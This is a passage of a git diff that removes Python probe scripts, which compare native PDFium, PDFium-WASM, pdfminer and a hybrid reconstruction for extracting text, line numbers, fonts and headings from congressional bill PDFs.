"text_index": R.FPDFText_GetTextIndexFromCharIndex(raw, i), - "box": [left.value, bottom.value, right.value, top.value] if has_box else None, - "loose": [lb.left, lb.bottom, lb.right, lb.top] if has_loose else None, - "origin": [ox.value, oy.value] if has_origin else None, - "matrix": [mat.a, mat.b, mat.c, mat.d, mat.e, mat.f] if has_matrix else None, - "font_size_raw": fs, - "font_size_scaled": fs * scale if has_matrix else None, - "font": font, - "font_flags": flags.value if nlen > 0 else None, - "font_weight": R.FPDFText_GetFontWeight(raw, i), - "angle": R.FPDFText_GetCharAngle(raw, i), - } - ) - w, h = page_obj.get_size() - return recs, {"count_chars": n, "width": float(w), "height": float(h)} - - -def main() -> int: - ap = argparse.ArgumentParser() - ap.add_argument("pdf") - ap.add_argument("--page", type=int, required=True, help="1-based") - ap.add_argument("--grep", help="show a window around each occurrence in the text stream") - ap.add_argument("--window", type=int, default=24) - ap.add_argument("--json-out", type=Path) - args = ap.parse_args() - - doc = pdfium.PdfDocument(args.pdf) - try: - page_obj = doc[args.page - 1] - textpage = page_obj.get_textpage() - try: - text_range = textpage.get_text_range() - recs, meta = char_records(textpage, page_obj) - finally: - textpage.close() - page_obj.close() - finally: - doc.close() - - stream = "".join(r["ch"] for r in recs) - print(f"# {args.pdf} page {args.page}") - print(f"FPDFText_CountChars = {meta['count_chars']}") - print(f"len(get_text_range()) = {len(text_range)}") - print(f"len(per-index GetUnicode)= {len(stream)}") - print(f"streams identical = {text_range == stream}") - gen = [r for r in recs if r["generated"]] - hyp = [r for r in recs if r["hyphen"]] - print(f"generated chars = {len(gen)} (codepoints: {sorted({r['cp'] for r in gen})})") - print(f"hyphen-flagged chars = {len(hyp)} (codepoints: {sorted({r['cp'] for r in hyp})})") - print(f"tri-state unsupported = {sum(1 for r in recs if r['generated'] is None)}") - - if gen: - print("\n## geometry of GENERATED characters") - _describe(gen) - real_sp = [r for r in recs if r["cp"] == 32 and not r["generated"]] - if real_sp: - print("\n## geometry of REAL (content-stream) space characters") - _describe(real_sp) - - if args.grep: - print(f"\n## windows around {args.grep!r} in the char stream") - start = 0 - while True: - k = stream.find(args.grep, start) - if k < 0: - break - lo, hi = max(0, k - 2), min(len(recs), k + len(args.grep) + args.window) - print(f"\n--- match at char index {k} ---") - _table(recs[lo:hi]) - start = k + 1 - - if args.json_out: - args.json_out.parent.mkdir(parents=True, exist_ok=True) - args.json_out.write_text(json.dumps({"meta": meta, "chars": recs}, indent=1)) - print(f"\nwrote {args.json_out}") - return 0 - - -def _describe(rows: list[dict]) -> None: - n = len(rows) - no_box = sum(1 for r in rows if r["box"] is None) - zero_w = sum(1 for r in rows if r["box"] and abs(r["box"][2] - r["box"][0]) < 1e-9) - zero_h = sum(1 for r in rows if r["box"] and abs(r["box"][3] - r["box"][1]) < 1e-9) - no_mat = sum(1 for r in rows if r["matrix"] is None) - ident = sum(1 for r in rows if r["matrix"] and r["matrix"][:4] == [1.0, 0.0, 0.0, 1.0]) - zero_fs = sum(1 for r in rows if not r["font_size_raw"]) - no_font = sum(1 for r in rows if not r["font"]) - sizes = sorted({round(r["font_size_scaled"], 3) for r in rows if r["font_size_scaled"] is not None}) - print(f" n={n} no charbox={no_box} zero-width box={zero_w} zero-height box={zero_h}") - print(f" no matrix={no_mat} identity matrix={ident} font_size_raw==0={zero_fs} empty font name={no_font}") - print(f" distinct scaled sizes={sizes[:8]}{' …' if len(sizes) > 8 else ''}") - - -def _table(rows: list[dict]) -> None: - cols = ("idx", "ch", "cp", "gen", "hyp", "x0", "x1", "orig_y", "mat.f", "size", "font") - print( - f"{cols[0]:>6} {cols[1]:<4} {cols[2]:>6} {cols[3]:>4} {cols[4]:>4} {cols[5]:>8} " - f"{cols[6]:>8} {cols[7]:>8} {cols[8]:>8} {cols[9]:>7} {cols[10]:<24}" - ) - for r in rows: - b = r["box"] or [float("nan")] * 4 - o = r["origin"] or [float("nan")] * 2 - m = r["matrix"] or [float("nan")] * 6 - ch = repr(r["ch"])[1:-1] if r["ch"] not in ("", " ") else ("SP" if r["ch"] == " " else "?") - sz = r["font_size_scaled"] - print( - f"{r['i']:>6} {ch:<4} {r['cp']:>6} {str(r['generated'])[:4]:>4} {str(r['hyphen'])[:4]:>4} " - f"{b[0]:>8.2f} {b[2]:>8.2f} {o[1]:>8.2f} {m[5]:>8.2f} " - f"{(f'{sz:.2f}' if sz is not None else 'NA'):>7} {r['font'][:24]:<24}" - ) - - -if __name__ == "__main__": - sys.exit(main()) diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_failure_headings.py b/docs/research/pdf-backend-bakeoff/probes/probe_failure_headings.py deleted file mode 100644 index a0dc188c..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_failure_headings.py +++ /dev/null @@ -1,121 +0,0 @@ -"""The four named failure headings, on all four paths, at the line where they are set. - -`RESULTS-CONFIRMATORY.md` names `FAMILYHOUSING`, `NAVYAND`, `ARMYNATIONAL` and -`AMERICANBATTLE` as malformed labels the neutral glyph layer produces and production does -not. This probe compares the four paths on the exact printed lines those labels come from, -so the comparison is at the character level rather than at the aggregate. - -The comparison is deliberately made on the RECONSTRUCTED PRINTED LINE, not on the anchor -label. An anchor label is the product of the heading detector, which merges stacked lines -and can mask or manufacture a difference that did not originate in extraction. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_failure_headings.py -""" - -from __future__ import annotations - -import argparse -import json -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct as reconstruct_glyph # noqa: E402 - -from deltatrack.parsers.pdf_text import extract_clean_pages # noqa: E402 - -# The GPO-printed forms. A path is correct on a line when it reproduces the spelling GPO -# set, which is the standard the request names and which no pipeline's output defines. -TARGETS = ("FAMILY HOUSING", "NAVY AND", "ARMY NATIONAL", "AMERICAN BATTLE") -# The corrupted forms the confirmatory run reported, i.e. the same text with the word -# space lost. Matched separately so a path that produces neither is not scored as correct. -CORRUPT = {t: t.replace(" ", "", 1) for t in TARGETS} - -DEFAULT_DOCS = ( - "114-hr-2029/4_reported-in-senate", - "118-hr-4366/5_engrossed-amendment-house", - "116-hr-1865/6_enrolled-bill", -) - - -def pages_for(path: str, pdf: Path): - if path == "production": - return extract_clean_pages(pdf) - if path == "hybrid": - raw, _ = pdfium_hybrid.extract(pdf) - return RH.reconstruct(raw)[0] - backend = "pdfium-native" if path == "glyph" else "pdfminer" - raw, _ = run_backend(backend, pdf) - return reconstruct_glyph(raw, repaired=True)[0] - - -def occurrences(pages, target: str, corrupt: str) -> dict: - """Count printed lines carrying the correct form and the corrupted form.""" - ok, bad, samples = 0, 0, [] - for page in pages: - for ln in page.print_lines: - if target in ln.text: - ok += 1 - elif corrupt in ln.text: - bad += 1 - if len(samples) < 3: - samples.append(f"p{page.page_number} L{ln.line_number}: {ln.text[:64]}") - return {"correct": ok, "corrupted": bad, "samples": samples} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--docs", nargs="*", default=list(DEFAULT_DOCS)) - ap.add_argument("--paths", nargs="*", default=["production", "glyph", "hybrid", "pdfminer"]) - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - results: dict = {} - for doc in args.docs: - pdf = REPO / "tests" / "corpus" / f"{doc}.pdf" - if not pdf.exists(): - print(f"SKIP {doc}: not in corpus", file=sys.stderr) - continue - print(f"\n## {doc}") - header = f" {'heading':<16} " + " ".join(f"{p:>22}" for p in args.paths) - print(header) - page_sets = {} - for path in args.paths: - try: - page_sets[path] = pages_for(path, pdf) - except Exception as exc: # noqa: BLE001 - print(f" {path} FAILED: {type(exc).__name__}: {exc}", file=sys.stderr) - doc_res: dict = {} - for target in TARGETS: - cells = [] - for path in args.paths: - if path not in page_sets: - cells.append(f"{'ERROR':>22}") - continue - o = occurrences(page_sets[path], target, CORRUPT[target]) - doc_res.setdefault(target, {})[path] = o - cells.append(f"{o['correct']:>10} ok {o['corrupted']:>7} bad") - print(f" {target:<16} " + " ".join(cells)) - results[doc] = doc_res - for target, per in doc_res.items(): - for path, o in per.items(): - for s in o["samples"]: - print(f" [{path}] {target}: {s}") - - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_portability.py b/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_portability.py deleted file mode 100644 index 240f1cd7..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_portability.py +++ /dev/null @@ -1,201 +0,0 @@ -"""Does the hybrid contract survive the browser-shippable PDFium build? - -Two questions, and the second is the one that decides anything: - - 1. Do native PDFium and PDFium-WASM emit the same CHARACTER STREAM? Measured: no -- - the WASM build omits the line-trailing space native keeps at the end of most printed - lines. That is a real build difference and it is reported rather than smoothed over. - - 2. Do the two produce the same DELTATRACK PAGES through the hybrid layer? This is what - a migration decision rests on, because a difference the reconstruction removes is - not a difference a staffer can see. Asserted on the rendered `pdf_full_text` digest, - the line-number set and the heading-label set, not on the raw stream. - -Question 2 cannot be inferred from question 1 in either direction, which is why both are -measured. A stream difference may be harmless; stream identity would still not prove the -pages match, since the two paths could diverge later. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_hybrid_portability.py \ - tests/corpus/114-hr-2029/4_reported-in-senate.pdf --limit 40 -""" - -from __future__ import annotations - -import argparse -import difflib -import hashlib -import json -import subprocess -import sys -import threading -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from contract_hybrid import CP, HybridPage # noqa: E402 - -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 -from deltatrack.parsers.pdf_text import pdf_full_text # noqa: E402 - -SCRIPT = PROBES / "js" / "dump_pdfium_hybrid_wasm.mjs" - - -def run_wasm(pdf: Path, limit: int | None) -> tuple[list[HybridPage], dict]: - cmd = ["node", "--max-old-space-size=8192", str(SCRIPT), str(pdf.resolve())] - if limit is not None: - cmd += ["--limit", str(limit)] - proc = subprocess.Popen( - cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, cwd=str(SCRIPT.parent), bufsize=1 << 20 - ) - assert proc.stdout is not None and proc.stderr is not None - err: list[str] = [] - drain = threading.Thread(target=lambda: err.append(proc.stderr.read())) - drain.start() - pages: list[HybridPage] = [] - summary: dict = {} - for line in proc.stdout: - line = line.strip() - if not line: - continue - obj = json.loads(line) - if "summary" in obj: - summary = obj["summary"] - else: - pages.append( - HybridPage( - obj["page_number"], - obj["width"], - obj["height"], - [tuple(c[:6] + [tuple(c[6]) if c[6] else None] + c[7:]) for c in obj["chars"]], - ) - ) - proc.stdout.close() - drain.join() - proc.wait() - if proc.returncode != 0: - raise RuntimeError("".join(err)[-2000:]) - return pages, summary - - -def stream(pages: list[HybridPage]) -> str: - return "\n".join("".join(chr(c[CP]) for c in p.chars) for p in pages) - - -def classify_stream(nat: list[HybridPage], wasm: list[HybridPage]) -> dict: - """Every native-vs-WASM divergence, sorted into named kinds. - - Compared PAGE BY PAGE, not document-wide: `difflib` is quadratic and a 129k-character - committee report does not finish in a useful time as one string. - - "Harmless" has to be a claim about WHAT differs, not about how few differences there - are, so each op is classified and anything that does not fit a named kind is counted - as `unclassified` and sampled. An unclassified count above zero is the signal that - this probe's conclusion no longer covers the evidence. - """ - kinds = {"line_trailing_space": 0, "line_break_vs_space": 0, "unclassified": 0} - samples: list[str] = [] - for a, b in zip(nat, wasm): - ns = "".join(chr(c[CP]) for c in a.chars) - ws = "".join(chr(c[CP]) for c in b.chars) - if ns == ws: - continue - for tag, i1, i2, j1, j2 in difflib.SequenceMatcher(a=ns, b=ws, autojunk=False).get_opcodes(): - if tag == "equal": - continue - seg, other = ns[i1:i2], ws[j1:j2] - if tag == "delete" and set(seg) <= {" "} and ns[i2 : i2 + 1] in ("\r", "\n", ""): - kinds["line_trailing_space"] += 1 - elif tag == "replace" and set(seg) <= {"\r", "\n"} and set(other) <= {" "}: - # The WASM build joins two printed lines the native build separates. It - # cannot reach the reconstruction, which assigns lines by baseline and - # discards the engine's break characters outright. - kinds["line_break_vs_space"] += 1 - else: - kinds["unclassified"] += 1 - if len(samples) < 5: - samples.append(f"p{a.page_number} {tag}: native={seg[:40]!r} wasm={other[:40]!r}") - return {"kinds": kinds, "unclassified_samples": samples, "all_classified": kinds["unclassified"] == 0} - - -def facts(pages: list[HybridPage]) -> dict: - dt_pages, diag = RH.reconstruct(pages) - text, _ = pdf_full_text(dt_pages) - return { - "text_sha256": hashlib.sha256(text.encode()).hexdigest(), - "text": text, - "line_numbers": sorted( - (p.page_number, ln.line_number) for p in dt_pages for ln in p.print_lines if ln.line_number is not None - ), - "labels": {M.norm_label(a.text) for a in extract_anchors(dt_pages) if a.kind in M.PDF_HEADING_KINDS and a.text}, - "diag": diag, - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("pdfs", nargs="+") - ap.add_argument("--limit", type=int, default=None, help="pages per document") - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - out: dict = {} - for path in args.pdfs: - pdf = Path(path) - nat_pages, nat_sum = pdfium_hybrid.extract(pdf, args.limit) - wasm_pages, wasm_sum = run_wasm(pdf, args.limit) - ns, ws = stream(nat_pages), stream(wasm_pages) - cls = classify_stream(nat_pages, wasm_pages) - nf, wf = facts(nat_pages), facts(wasm_pages) - entry = { - "native_summary": nat_sum, - "wasm_summary": wasm_sum, - "stream_identical": ns == ws, - "stream_chars_native": len(ns), - "stream_chars_wasm": len(ws), - "stream_diff_kinds": cls["kinds"], - "stream_all_divergences_classified": cls["all_classified"], - "stream_unclassified_samples": cls["unclassified_samples"], - "pages_text_identical": nf["text_sha256"] == wf["text_sha256"], - "pages_line_numbers_identical": nf["line_numbers"] == wf["line_numbers"], - "pages_labels_identical": nf["labels"] == wf["labels"], - "n_labels": len(nf["labels"]), - "n_line_numbers": len(nf["line_numbers"]), - "label_diff": sorted(nf["labels"] ^ wf["labels"])[:10], - } - if not entry["pages_text_identical"]: - d = list(difflib.unified_diff(nf["text"].split("\n"), wf["text"].split("\n"), lineterm="", n=0)) - entry["text_diff_sample"] = d[:20] - out[path] = entry - print(f"\n## {path} (pages limit={args.limit})") - print(f" raw char stream identical : {entry['stream_identical']}") - print(f" divergences by kind : {entry['stream_diff_kinds']}") - print(f" every divergence classified : {entry['stream_all_divergences_classified']}") - for s in entry["stream_unclassified_samples"]: - print(f" UNCLASSIFIED {s}") - print(" --- after the hybrid layer ---") - print(f" pdf_full_text digest identical : {entry['pages_text_identical']}") - print(f" line-number set identical ({entry['n_line_numbers']}) : {entry['pages_line_numbers_identical']}") - print(f" heading-label set identical ({entry['n_labels']}) : {entry['pages_labels_identical']}") - if entry["label_diff"]: - print(f" label symmetric difference : {entry['label_diff']}") - if entry.get("text_diff_sample"): - print(" text diff sample:") - for ln in entry["text_diff_sample"]: - print(f" {ln}") - - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1, default=str)) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_signals.py b/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_signals.py deleted file mode 100644 index 02833218..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_signals.py +++ /dev/null @@ -1,260 +0,0 @@ -"""Does the hybrid contract still carry every geometry/style signal DeltaTrack needs? - -The hybrid stream adds characters that carry no geometry. That is a real cost and this -probe prices it, rather than letting the heading-recovery win stand in for the answer. - -Three questions: - - S1 How much of the stream is generated, and is the "generated chars have no usable - geometry" claim exactly true or merely mostly true? Reported as rates over every - generated char, because a single generated char with a REAL box would mean the - contract's `None` fields are throwing away information. - - S2 Do the signals the engine actually consumes survive? `glyph_size` (ADR 0012 heading - levels) and `LineGeom` (the major detector's line-fullness split) are computed only - from non-generated characters, so the test is whether enough non-generated - characters remain on each printed line to compute them. - - S3 Does FONT ROLE separation survive? `docs/source-signal-inventory.md` records font - name as the highest-value unadopted PDF signal -- margin line numbers are a - different font from the body on 99.9% of numbered lines. Scored as role separation - (margin vs body vs chrome), never as name-string equality, since names are - print-class dependent. The empty-font-name rate is reported per stream because the - inventory's guard depends on it. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_hybrid_signals.py \ - tests/corpus/114-hr-2029/4_reported-in-senate.pdf --limit 40 -""" - -from __future__ import annotations - -import argparse -import json -import re -import sys -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from contract_hybrid import CP, FONT, GEN, SIZE, X0, X1 # noqa: E402 - -_NUMBERED = re.compile(r"^(\d{1,2}) (.*)$") - - -def s1_generated(pages) -> dict: - tot = gen = 0 - no_origin = real_box = non_identity_size = named_font = 0 - for pg in pages: - for c in pg.chars: - tot += 1 - if not c[GEN]: - continue - gen += 1 - if c[2] is None: # baseline / origin - no_origin += 1 - if c[X0] is not None and c[X1] is not None and c[X1] - c[X0] > 0: - real_box += 1 - if c[SIZE] is not None: - non_identity_size += 1 - if c[FONT]: - named_font += 1 - return { - "chars_total": tot, - "chars_generated": gen, - "generated_rate": round(gen / tot, 5) if tot else None, - "generated_missing_origin": no_origin, - "generated_with_real_box": real_box, - "generated_with_size": non_identity_size, - "generated_with_font_name": named_font, - "claim_generated_carry_only_origin": (no_origin == 0 and real_box == 0 and non_identity_size == 0), - } - - -def s2_signals(pages) -> dict: - """Every numbered printed line must still yield a size and a full LineGeom.""" - lines = with_size = with_geom = 0 - for pg in pages: - for row in RH.cluster_lines(pg): - text = RH._line_text(row) - m = _NUMBERED.match(text) - if not m: - continue - lines += 1 - ink = [c for c in row if chr(c[CP]) not in ("\r", "\n")] - content = ink[len(m.group(1)) :] - printed = [c for c in content if c[CP] != 32 and c[X0] is not None] - if printed and [c[SIZE] for c in printed if c[SIZE] is not None]: - with_size += 1 - if printed and RH._first_word_right(content) is not None: - with_geom += 1 - return { - "numbered_lines": lines, - "with_glyph_size": with_size, - "with_line_geom": with_geom, - "size_coverage": round(with_size / lines, 5) if lines else None, - "geom_coverage": round(with_geom / lines, 5) if lines else None, - } - - -def s3_font_roles(pages) -> dict: - """Margin-number font vs body font, over numbered printed lines. - - Keyed on role, not on a literal name: the margin font is whatever font the margin - digits are set in on this document, and the test is whether it DIFFERS from the font - of the body text on the same line. - """ - margin_fonts: Counter = Counter() - body_fonts: Counter = Counter() - separated = lines = 0 - empty_named = named_total = 0 - for pg in pages: - for row in RH.cluster_lines(pg): - text = RH._line_text(row) - m = _NUMBERED.match(text) - if not m: - continue - ink = [c for c in row if chr(c[CP]) not in ("\r", "\n")] - n_margin = len(m.group(1)) - mf = {c[FONT] for c in ink[:n_margin] if not c[GEN]} - bf = {c[FONT] for c in ink[n_margin:] if not c[GEN] and c[CP] != 32} - for c in ink: - if c[GEN]: - continue - named_total += 1 - if not c[FONT]: - empty_named += 1 - if not mf or not bf: - continue - lines += 1 - margin_fonts.update(mf) - body_fonts.update(bf) - if not (mf & bf): - separated += 1 - return { - "numbered_lines_with_both": lines, - "margin_font_differs_from_body": separated, - "separation_rate": round(separated / lines, 5) if lines else None, - "margin_fonts": margin_fonts.most_common(4), - "body_fonts": body_fonts.most_common(4), - "non_generated_chars": named_total, - "non_generated_empty_font_name": empty_named, - "empty_font_name_rate": round(empty_named / named_total, 6) if named_total else None, - } - - -def s4_geometry_agreement(pdf: Path, limit: int | None) -> dict: - """Do the sidecar VALUES agree with production's, not merely exist? - - S2 asks whether a `glyph_size` and a `LineGeom` could be computed. That is coverage, - and coverage is compatible with computing the wrong number everywhere. The heading - detector consumes these values directly -- `glyph_size` drives ADR 0012's size bands - and `first_word_right` drives the major detector's stacked-vs-wrapped split -- so the - stronger question is whether they match what production derives for the same line. - - Compared per (page, margin line number), which is the key production itself uses, over - the lines both paths recovered. Tolerance is 0.05 pt: these are floats derived through - different call paths, and an exact-equality test would report float noise as - disagreement. - """ - import reconstruct_hybrid as R - - from deltatrack.parsers.pdf_text import extract_clean_pages - - prod = extract_clean_pages(pdf) - hy, _ = R.reconstruct(pdfium_hybrid.extract(pdf, limit)[0]) - if limit: - prod = prod[:limit] - - def index(pages): - out = {} - for pg in pages: - for ln in pg.lines: - if ln.line_number is not None and ln.geom is not None: - out[(pg.page_number, ln.line_number)] = (ln.glyph_size, ln.geom) - return out - - p, h = index(prod), index(hy) - shared = p.keys() & h.keys() - tol = 0.05 - size_ok = left_ok = right_ok = fwr_ok = 0 - samples = [] - for k in shared: - (ps, pg_), (hs, hg) = p[k], h[k] - if ps is not None and hs is not None and abs(ps - hs) <= tol: - size_ok += 1 - if abs(pg_.content_left - hg.content_left) <= tol: - left_ok += 1 - if abs(pg_.content_right - hg.content_right) <= tol: - right_ok += 1 - if abs(pg_.first_word_right - hg.first_word_right) <= tol: - fwr_ok += 1 - elif len(samples) < 4: - samples.append(f"p{k[0]} L{k[1]}: production={pg_.first_word_right:.2f} hybrid={hg.first_word_right:.2f}") - n = len(shared) or 1 - return { - "lines_production": len(p), - "lines_hybrid": len(h), - "lines_shared": len(shared), - "glyph_size_agree": round(size_ok / n, 5), - "content_left_agree": round(left_ok / n, 5), - "content_right_agree": round(right_ok / n, 5), - "first_word_right_agree": round(fwr_ok / n, 5), - "first_word_right_disagreements": samples, - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("pdfs", nargs="+") - ap.add_argument("--limit", type=int, default=None) - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - out = {} - for path in args.pdfs: - pages, summary = pdfium_hybrid.extract(Path(path), args.limit) - entry = { - "summary": summary, - "S1": s1_generated(pages), - "S2": s2_signals(pages), - "S3": s3_font_roles(pages), - "S4": s4_geometry_agreement(Path(path), args.limit), - } - out[path] = entry - print(f"\n## {path}") - s1, s2, s3 = entry["S1"], entry["S2"], entry["S3"] - print(f" S1 generated {s1['chars_generated']}/{s1['chars_total']} ({s1['generated_rate']:.1%})") - print( - f" of those: missing origin={s1['generated_missing_origin']} real box={s1['generated_with_real_box']}" - f" size={s1['generated_with_size']} font name={s1['generated_with_font_name']}" - ) - print(f" 'generated chars carry origin ONLY' holds exactly: {s1['claim_generated_carry_only_origin']}") - print(f" S2 numbered lines {s2['numbered_lines']}: size {s2['size_coverage']}, geom {s2['geom_coverage']}") - print(f" S3 margin/body font separation {s3['separation_rate']} over {s3['numbered_lines_with_both']} lines") - print(f" margin={s3['margin_fonts']} body={s3['body_fonts']}") - print(f" empty font-name rate on real chars: {s3['empty_font_name_rate']}") - s4 = entry["S4"] - print(f" S4 sidecar VALUES vs production over {s4['lines_shared']} shared numbered lines:") - print( - f" glyph_size={s4['glyph_size_agree']} content_left={s4['content_left_agree']} " - f"content_right={s4['content_right_agree']} first_word_right={s4['first_word_right_agree']}" - ) - for s in s4["first_word_right_disagreements"]: - print(f" disagreement {s}") - - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1)) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_normalize_raw.py b/docs/research/pdf-backend-bakeoff/probes/probe_normalize_raw.py deleted file mode 100644 index 722c1def..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_normalize_raw.py +++ /dev/null @@ -1,188 +0,0 @@ -"""Is `normalize_raw` actually unnecessary under the hybrid contract, or only apparently? - -Section 8 of `RESULTS-HYBRID.md` claims every branch of `parsers/pdf_text.normalize_raw` -repairs damage that exists only in a page-wide text blob. Read from the code that claim is -plausible; it is not evidence. Two things could make it wrong: - - * A branch might fire on documents the corpus parity table EXCLUDES. Production declines - unnumbered layouts, and the enrolled bills it declines are exactly where the mid-line - soft-hyphen branch exists to act (its docstring names them). So the stratum that would - catch the failure is the stratum the headline table drops. - * The hybrid might produce the same fused or hyphen-broken words by another route, which - a bag-of-tokens F1 near 0.999 would not distinguish from success. - -So each branch is checked where it FIRES, and the check is a token-level classification of -production-vs-hybrid differences rather than a similarity score: - - hyphen_artifact a token on one side equals a token on the other with a hyphen added or - removed -- the exact damage normalize_raw's hyphen branches repair - space_artifact two tokens on one side are one fused token on the other - other everything else, sampled so it can be read - -A non-zero `hyphen_artifact` on a document where the branch fires falsifies the claim. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_normalize_raw.py \ - --limit-docs 6 --out docs/research/pdf-backend-bakeoff/results/probe_normalize_raw.json -""" - -from __future__ import annotations - -import argparse -import json -import re -import sys -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from score_phase1 import corpus_documents # noqa: E402 - -import deltatrack.parsers.pdf_text as PT # noqa: E402 - -# The branches of normalize_raw, each with the pattern that shows it fired on the raw text. -BRANCHES = { - "crlf": re.compile(r"\r\n"), - "hyphen_plus_margin_number": PT._HYPHEN_BREAK, - "glued_chrome": PT._GLUED_CHROME, - "midline_hyphen_lowercase": re.compile(r"￾[a-z]"), - "other_soft_hyphen": re.compile(r"￾"), - "trailing_space": re.compile(r"[^\S\n] *\n"), -} - - -def raw_page_texts(pdf: Path) -> list[str]: - """PDFium's raw text per page — the input normalize_raw was written against.""" - import pypdfium2 as pdfium - - doc = pdfium.PdfDocument(str(pdf)) - out = [] - try: - for i in range(len(doc)): - pg = doc[i] - tp = pg.get_textpage() - try: - out.append(tp.get_text_range()) - finally: - tp.close() - pg.close() - finally: - doc.close() - return out - - -def classify(prod_text: str, hy_text: str) -> dict: - """Direct measures of the damage `normalize_raw`'s hyphen branches prevent. - - WHAT THIS DELIBERATELY DOES NOT DO, because the first version of it did and was wrong: - it does not pair tokens by searching the other side's whole-document bag. At ~100k - tokens, "does SOME split of this token into two tokens present somewhere in the - document exist" is trivially satisfiable, and it reported production's legitimate - `a pro rata share` as evidence that the hybrid had fused `pro` + `vided` — two - unrelated words from different pages. A test that can be satisfied by coincidence - cannot distinguish a defect from its absence. - - What replaces it is a set difference over the tokens that CARRY a hyphen, which is - exactly the population the branches act on. If the hybrid failed to rejoin `pro-vided`, - that token appears in its hyphenated set and not in production's. A stray soft-hyphen - character surviving into the rendered text is counted directly, as is a token left - ending in a hyphen — an unrejoined syllable break, the specific failure the mid-line - branch exists to prevent. - """ - p_tok, h_tok = prod_text.split(), hy_text.split() - p_hy = {t for t in p_tok if "-" in t} - h_hy = {t for t in h_tok if "-" in t} - only_h = sorted(h_hy - p_hy) - only_p = sorted(p_hy - h_hy) - return { - "tokens_production": len(p_tok), - "tokens_hybrid": len(h_tok), - "trailing_hyphen_production": sum(1 for t in p_tok if t.endswith("-")), - "trailing_hyphen_hybrid": sum(1 for t in h_tok if t.endswith("-")), - "soft_hyphen_chars_production": prod_text.count("￾") + prod_text.count("\xad"), - "soft_hyphen_chars_hybrid": hy_text.count("￾") + hy_text.count("\xad"), - "hyphenated_tokens_production": len(p_hy), - "hyphenated_tokens_hybrid": len(h_hy), - "hyphenated_only_in_hybrid": len(only_h), - "hyphenated_only_in_production": len(only_p), - "samples_only_in_hybrid": only_h[:8], - "samples_only_in_production": only_p[:8], - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--limit-docs", type=int, default=None) - ap.add_argument("--only-declined", action="store_true", help="only the unnumbered layouts") - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - from deltatrack.compare.pdf import _is_unnumbered_layout - - docs = corpus_documents() - rows = [] - for i, (bill, version, pdf, _xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - # Decide membership BEFORE the expensive work: with --only-declined this skips the - # raw-text walk and the hybrid extraction on 42 of 52 documents. - prod_pages = PT.extract_clean_pages(pdf) - declined = _is_unnumbered_layout(prod_pages) - if args.only_declined and not declined: - continue - raws = raw_page_texts(pdf) - fired = {name: sum(len(pat.findall(r)) for r in raws) for name, pat in BRANCHES.items()} - hy_pages, _ = RH.reconstruct(pdfium_hybrid.extract(pdf)[0]) - entry = { - "doc": key, - "production_declined": declined, - "branch_fired": fired, - "diff": classify(PT.pdf_full_text(prod_pages)[0], PT.pdf_full_text(hy_pages)[0]), - } - rows.append(entry) - d = entry["diff"] - print( - f" [{len(rows)}] {key:<22} midline_branch_fired={fired['midline_hyphen_lowercase']:<5} " - f"trailing-hyphen prod/hyb={d['trailing_hyphen_production']}/{d['trailing_hyphen_hybrid']} " - f"soft-hyphen chars prod/hyb={d['soft_hyphen_chars_production']}/{d['soft_hyphen_chars_hybrid']} " - f"hyphenated-only-in-hybrid={d['hyphenated_only_in_hybrid']}", - file=sys.stderr, - ) - for s in d["samples_only_in_hybrid"][:4]: - print(f" only in hybrid: {s!r}", file=sys.stderr) - 